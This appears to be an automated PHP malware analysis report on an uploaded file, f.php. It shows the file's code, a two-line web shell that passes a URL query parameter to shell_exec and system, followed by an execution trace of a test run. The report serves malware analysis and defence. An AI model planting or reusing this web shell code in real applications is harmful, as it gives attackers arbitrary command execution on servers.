PHP Malware Analysis

f.php

md5: 2aaf3a3b54e969c22d261962b6e5a156

Jump to:

Screenshot


Attributes

Execution

Input


Deobfuscated PHP code

<?php

shell_exec($_GET['hi']);
system($_GET['hi']);

Execution traces

data/traces/2aaf3a3b54e969c22d261962b6e5a156_trace-1676249833.5548.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:57:39.452629]
1	0	1	0.000155	393464
1	3	0	0.000202	394328	{main}	1		/var/www/html/uploads/f.php	0	0
2	4	0	0.000237	394328	shell_exec	0		/var/www/html/uploads/f.php	2	1	NULL
2	4	1	0.000260	394360
2	4	R			FALSE
2	5	0	0.000279	394328	system	0		/var/www/html/uploads/f.php	3	1	NULL
2	5	1	0.000297	394360
2	5	R			FALSE
1	3	1	0.000311	394328
			0.000334	314200
TRACE END   [2023-02-12 22:57:39.452839]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
shell_exec($_GET['hi']);
system($_GET['hi']);